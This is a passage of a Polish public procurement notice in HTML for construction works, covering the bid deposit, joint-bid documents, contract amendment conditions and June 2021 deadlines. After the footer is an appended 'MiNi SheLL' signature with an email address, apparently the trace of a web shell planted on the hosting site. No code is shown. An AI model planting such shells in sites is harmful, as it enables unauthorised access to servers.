wypłatę wadium w<br/>następujących okolicznościach:1) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa<br/>w art. 107 ust. 2 lub art. 128 ust. 1 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył<br/>podmiotowych środków dowodowych lub przedmiotowych środków dowodowych<br/>potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 ustawy Pzp,<br/>oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, innych dokumentów lub oświadczeń<br/>lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 ustawy Pzp,<br/>co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako<br/>najkorzystniejszej;2) jeżeli wykonawca, którego oferta została wybrana:a) odmówił podpisania<br/>umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,b) nie wniósł<br/>wymaganego zabezpieczenia należytego wykonania umowy;3) jeżeli zawarcie umowy w<br/>sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie<br/>Wykonawcy, którego oferta została wybrana.9. Zamawiający zwróci wadium niezwłocznie, niepóźniej jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:1) upływu terminu<br/>związania ofertą;2) zawarcia umowy w sprawie zamówienia publicznego;3) unieważnienia<br/>postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało rozstrzygnięte<br/>odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.10.<br/>Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwróci wadium Wykonawcy:1) który wycofał ofertę przed upływem terminu składania ofert;2)<br/>którego oferta została odrzucona;3) po wyborze najkorzystniejszej oferty, z wyjątkiem<br/>Wykonawcy, którego oferta została wybrana jako najkorzystniejsza;4) po unieważnieniu<br/>postępowania, w przypadku, gdy nie zostało rozstrzygnięte odwołanie na czynność<br/>unieważnienia albo nie upłynął termin do jego wniesienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Każdy załączany do oferty plik zawierający dokumenty, oświadczenia lub pełnomocnictwa musi<br/>być uprzednio podpisany podpisami kwalifikowanymi, podpisami osobistymi lub podpisami<br/>zaufanymi przez upoważnione osoby reprezentujące odpowiednio wykonawcę, podmioty<br/>wspólnie ubiegające się o udzielenie zamówienia, podmiot trzeci, na którego zasoby<br/>Wykonawca się powołuje lub podwykonawców.Do oferty należy dołączyć:1) pełnomocnictwo<br/>upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;2) pełnomocnictwo dla<br/>pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia;3) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z<br/>postępowania oraz spełnieniu warunków udziału w postępowaniu – wzór oświadczenia stanowi<br/>Załącznik Nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców zaś<br/>oświadczenie o spełnieniu warunków udziału w postępowaniu ten z wykonawców który dany<br/>warunek spełnia z zaznaczeniem, który warunek postawiony przez Zamawiającego jest<br/>spełniony przez danego Wykonawcę wspólnie ubiegającego się o udzielenie zamówienia.4) w<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Wykonawcy składają<br/>oświadczenie z art. 117 ust. 4 ustawy Pzp, którego wzór stanowi Załącznik nr 7 do SWZ.Przed<br/>podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w<br/>przypadku wyboru ich oferty jako najkorzystniejszej) przedstawią Zamawiającemu umowę<br/>regulującą współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający oświadcza, iż przewiduje możliwość zmian umowy w stosunku do treści oferty,<br/>na podstawie której dokonano wyboru Wykonawcy, w przypadkach wskazanych w niniejszym<br/>paragrafie.2. Zamawiający dopuszcza możliwość zmiany terminu wykonania przedmiotu umowy<br/>określonego w § 2 ust. 1, spowodowanego jedną z następujących przyczyn:1) wystąpienia<br/>konieczności wykonania robót zamiennych, robót dodatkowych, które wstrzymują lub opóźniają<br/>realizację przedmiotu umowy – o okres opóźnienia lub wstrzymania prac;2) wystąpienia<br/>konieczności wykonania robót budowlanych objętych zamówieniem dodatkowym, których<br/>wykonanie jest niezbędne do wykonania zamówienia podstawowego, skutkujące zmianą<br/>zakresu robót i/lub przedłużenia terminu realizacji zamówienia. Roboty objęte zamówieniem<br/>dodatkowym będą zlecane po zawarciu z Wykonawcą odrębnej umowy o zamówienie<br/>dodatkowe. Udzielenie zamówienia dodatkowego musi być poprzedzone sporządzeniem protokołu konieczności – o okres opóźnienia lub wstrzymania prac związanych z wykonaniem<br/>robót objętych zamówieniem dodatkowym;3) wystąpienia konieczności dokonania zmian w<br/>dokumentacji projektowej – o okres, w którym będą dokonywane zmiany projektowe oraz<br/>ewentualne trwające w związku z tym postępowania administracyjne;4) działania siły wyższej,<br/>czyli niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nią<br/>powołuje, i których konsekwencji pomimo zachowania należytej staranności nie można było<br/>przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego. Pod<br/>pojęciem siły wyższej na potrzeby niniejszego warunku, należy rozumieć zdarzenie zewnętrzne<br/>o charakterze niezależnym od stron, którego nie można uniknąć, ani któremu nie mogły<br/>zapobiec Strony przy zachowaniu należytej staranności, oraz którego nie można przypisać<br/>drugiej stronie. Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności<br/>pożar, powódź, silne wiatry, obfite opady atmosferyczne, ekstremalny upał lub mróz, wojny,<br/>stany nadzwyczajne, klęski żywiołowe, epidemie, ograniczenia związane z kwarantanną,<br/>embargo, rewolucje, zamieszki i strajki trwające powyżej 7 dni roboczych lub inne zdarzenie<br/>związane z działaniem sił natury, jeżeli uniemożliwiają lub znacznie utrudniają prowadzenie<br/>robót budowlanych – o okres działania siły wyższej oraz usuwania skutków jej działania.3.W<br/>przypadku ustania przyczyn określonych w ust. 2, Strony niezwłocznie przystąpią do realizacji<br/>swych obowiązków wynikających z umowy.4.Po ustaniu przyczyn uniemożliwiających<br/>wykonywanie przedmiotu zamówienia Wykonawca jest zobowiązany niezwłocznie zawiadomić o<br/>tym fakcie Zamawiającego.5.Wraz z zawiadomieniem Wykonawca jest zobowiązany<br/>przedstawić dowody potwierdzające zaistnienie zdarzeń uzasadniających wydłużenie terminu<br/>wykonania zamówienia oraz potwierdzające długość okresu, przez który przedmiot zamówienia<br/>nie mógł być wykonywany. 6. Dowodami mogą być w szczególności:1) informacje Instytutu<br/>Meteorologii i Gospodarki Wodnej potwierdzające zaistnienie zdarzenia, na które powołuje się<br/>Wykonawca;2) dokumentacja fotograficzna;3) pisma właściwych organów;4) decyzje<br/>administracyjne wydane przez właściwe organy;5) oświadczenia Wykonawcy.7. Wraz z<br/>zawiadomieniem o ustaniu przyczyn uniemożliwiających wykonywanie przedmiotu zamówienia<br/>Wykonawca może złożyć wniosek o wydłużenie terminu realizacji przedmiotu zamówienia.8.<br/>Wnioskowany okres wydłużenia realizacji przedmiotu zamówienia nie może być dłuższy niż<br/>okresy, o których mowa w ust. 2.9. W przypadku zaistnienia okoliczności, o których mowa w ust.<br/>2 Zamawiający po rozpatrzeniu wniosku Wykonawcy, w terminie nie dłuższym niż 7 dni<br/>kalendarzowych, może wydłużyć termin realizacji przedmiotu zamówienia. Przepis ust. 8 stosuje<br/>się odpowiednio.Ze względu na ograniczoną liczbę znaków pozostałe zapisy znajdują sie w par.<br/>17 od ust. 10 do 13 Załącznika Nr 2 do SWZ - PROJEKTOWANE POSTANOWIENIA UMOWY <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-07 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy zakupowej. Sposób złożenia oferty opisany został w Instrukcji dotyczącej sposobu i formy złożenia oferty dostępnej na stronie internetowej: www.platformazakupowa.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-07 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-01</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-18 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com